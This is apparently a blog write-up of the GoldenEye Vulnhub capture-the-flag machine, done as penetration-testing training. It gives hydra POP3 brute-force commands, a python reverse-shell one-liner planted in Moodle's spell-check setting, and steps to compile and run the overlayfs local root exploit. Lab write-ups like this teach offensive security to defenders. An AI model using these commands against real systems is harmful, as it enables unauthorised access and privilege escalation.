Linux Privilege Escalation | GoldenEye Vulnhub CTF walkthrough | OSCP Machine

Motasem Hamdan
3 min readJul 25, 2024


We demonstrated the solution walkthrough of GoldenEye Vulnhub machine in which we covered many penentration testing concepts and used several tools such as hydra and nmap. In Goldeneye, we also demonstrated exploiting vulnerable web applications which was Moodle in this scenario.

Summary & Highlights

Enumeration & Information Gathering

Nmap command used in this scenario:

nmap -sC -sV

The web page contains this directory, /sev-home, which prompts for user credentials.

Page source code contains terminal.js which contains an encoded password for user boris:


With the aid of Cyberchef, we can decode the password using “Magic” recipe:

Decoded password: InvincibleHack3r

Pop3 Password Brute Force with Hydra

We can use the below commands for both users Natalya & boris:

hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f -s 55007 pop3
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f -s 55007 pop3

After successful brute force, the credentials are:


With these credentials in hand, you can login to pop3 server and you can also check out pop3 commands documentation from here.

After logging in with natalya user and executing two pop3 commands:


You will find the plain text credentials below along with a domain:

username: xenia
password: RCP90rulez!


To access this domain, open your /etc/hosts file and add the below line:

Then visit the page and you will find that it’s Moodle CMS.

Moodle CMS Exploitation

Loging with the below credentials found in the previous step:

username: xenia
password: RCP90rulez!

Look in the messages section and you will find that there is a message between xenia and Dr Doak where Dr Doak is giving out his username doak.

Again, Pop3 Password Brute Force with Hydra

With doak as a username and fasttrack.txt as a wordlist, run the below command to brute force the password:

hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f -s 55007 pop3

Valid credentials are:


With the same drill, you can login to pop3 server and in the messages you will find another set of credentials for Moodle CMS:


Login with these credentials to Moodle CMS and you will find s3cret.txt file under My Profile–>My Private Files

Upon opening the file, there is a note metioning web location /dir00key/for-007.jpg which upon visiting you will see an image that you can download.

Image Metadata Extraction With Exiftool

Run the below command:

exiftool for-007.jpg

In the description section of the image metadata you will find this encoded base64 string:


The decoded form, which can be obtained through cyberchef, is xWinter1995x!

Then you can use this password along with admin as a username to login to the administration panel of Moodle CMS.

Exploiting Spell Checking Feature in Moodle CMS

You can add a reverse shell in the “path to spell” section in spell functionality feature. We can use the python reverse shell shown below:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4545));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

In Moodle CMS, follow the below navigation path:

Home–>Site administration →Plugins →Text Editors — ->TinyMCE HTML

And set spell engine to PSpellShell

After saving the settings, navigate to Home–>My profile →Blogs →Add new entry

In there, you don’t need to write anything, just click on the spell check button

This will hang the page but if you look at the listener you established in your attacking machine, you will find that you received your shell session.

Linux Privilege Escalation with Linpeas & Overlayfs

After the first foothold, you can execute the below Python command to stabilize the shell:

python -c 'import pty;pty.spawn("/bin/bash")'

With linpeas downloaded to the machine and run, Linpeas gives us the suggestion to exploit the popular overlayfs Linux vulnerability to escalate the privileges.

Download the exploit:


Rename it ti 37292.c and compile it using gcc compiler:

gcc 37292.c -o exploit

if you get an error, open the exploit file and locate the line where it says:

Lib = system(“gcc -fPI……

And change gcc to cc and try again.

Finally run the exploit to get root:

chmod +x exploit

Check out the video below for detailed explanation.



Motasem Hamdan

Motasem Hamdan is a content creator and swimmer who creates cyber security training videos and articles.